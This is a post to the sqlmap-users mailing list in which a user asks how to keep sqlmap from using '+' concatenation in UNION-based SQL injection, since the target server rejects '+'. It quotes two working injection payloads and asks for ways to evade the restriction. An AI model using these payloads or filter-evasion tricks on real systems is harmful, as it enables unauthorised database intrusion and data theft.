I noticed that sqlmap is using '+' signs when doing union injection, and I can't seem to stop it from doing that (maybe there's a tamper script I missed?).
So I have a scenario, where + is not allowed on the server. Thus the following payload works -579 UNION ALL SELECT 1 -- While this one wont -579 UNION ALL SELECT CHAR(58)+CHAR(110)+CHAR(104)+CHAR(113)+CHAR(58)+CHAR(111)+CHAR(118)+CHAR(107)+CHAR(99)+CHAR(77)+CHAR(73)+CHAR(82)+CHAR(122)+CHAR(100)+CHAR(76)+CHAR(58)+CHAR(120)+CHAR(98)+CHAR(101)+CHAR(58)-- Suggestions on how I could solve such a situation? :-) ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
